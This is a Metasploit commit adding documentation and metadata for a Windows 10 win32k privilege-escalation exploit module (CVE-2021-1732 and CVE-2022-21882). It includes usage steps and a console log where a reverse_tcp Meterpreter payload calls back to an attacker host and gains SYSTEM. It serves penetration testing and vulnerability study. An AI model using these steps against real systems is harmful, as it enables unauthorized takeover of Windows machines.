dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Writeup the module metadata and docs

This commit is contained in:
Spencer McIntyre 2022-02-18 14:42:41 -05:00
parent d92259f868
commit bcd7cb1122
2 changed files with 124 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

86
documentation/modules/exploit/windows/local/cve_2022_21882_win32k.md Normal file
View File

@ -0,0 +1,86 @@
## Vulnerable Application
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
achieve an out of bounds write operation, eventually leading to privilege escalation.
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
function on a wider range of Windows 10 targets.
Windows 10 builds 17134 (v1803) through 19041 (v20H1) will use the original technique from CVE-2021-1732, leveraging
`user32!CreateWindowEx` to trigger the `xxxClientAllocWindowClassExtraBytes` hook and corrupt the target window. Windows
10 builds 19042 (v20H2) through 19044 (v21H2) will use the updated technique from CVE-2022-21882, leveraging
`win32u!NtUserMessageCall` to trigger the `xxxClientAllocWindowClassExtraBytes` hook for the same effect.
### Installation And Setup
Windows 10 versions 1803 through 21H2 (without the patch) are vulnerable out of the box. This exploit module has been
tested on Windows 10 versions 1803, 1909, 20H1, 20H2 and 21H2.
## Verification Steps
1. Start msfconsole
1. Get a Meterpreter session on a vulnerable host
1. Do: `use exploit/windows/local/cve_2022_21882_win32k`
1. Set the `SESSION` and `PAYLOAD` options
1. Do: `run`
1. You should get a shell.
## Scenarios
### Windows 10 Version 21H2 Build 19044.1288 x64
```
msf6 exploit(windows/local/cve_2022_21882_win32k) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-SRAQBLH\smcintyre
meterpreter > sysinfo
Computer : DESKTOP-SRAQBLH
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/local/cve_2022_21882_win32k) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2022_21882_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21882_win32k) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/local/cve_2022_21882_win32k) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 6840 launched.
[*] Reflectively injecting the DLL into 6840...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.159.87
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.87:52622 ) at 2022-02-18 14:34:00 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-SRAQBLH
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```

47
modules/exploits/windows/local/cve_2022_21882_win32k.rb
View File

@ -12,18 +12,39 @@ class MetasploitModule < Msf::Exploit::Local
include Msf::Post::Windows::ReflectiveDLLInjection
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Deprecated
moved_from 'exploit/windows/local/cve_2021_1732_win32k'
def initialize(info = {})
super(
update_info(
info,
{
'Name' => '',
'Name' => 'Win32k ConsoleControl Offset Confusion',
'Description' => %q{
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
achieve an out of bounds write operation, eventually leading to privilege escalation.
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
function on a wider range of Windows 10 targets.
},
'License' => MSF_LICENSE,
'Author' => [
# CVE-2021-1732
'BITTER APT', # exploit as used in the wild
'JinQuan', # detailed analysis
'MaDongZe', # detailed analysis
'TuXiaoYi', # detailed analysis
'LiHao', # detailed analysis
# CVE-2022-21882
'L4ys', # github poc
'KaLendsi', # github poc
# both CVEs
'KaLendsi', # github pocs
# Metasploit exploit
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X64 ],
@ -33,26 +54,34 @@ class MetasploitModule < Msf::Exploit::Local
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows 10 v20H2-21H2 x64', { 'Arch' => ARCH_X64 } ]
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' => {
'DisableNops' => true
},
'References' => [
# CVE-2021-1732 references
[ 'CVE', '2021-1732' ],
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
# CVE-2022-21882 references
[ 'CVE', '2022-21882' ],
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
],
'DisclosureDate' => '',
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
'SideEffects' => [],
'RelatedModules' => [
# this module exploits the original vulnerability for which this is a patch bypass
'exploit/windows/local/cve_2021_1732_win32k'
]
'SideEffects' => []
}
}
)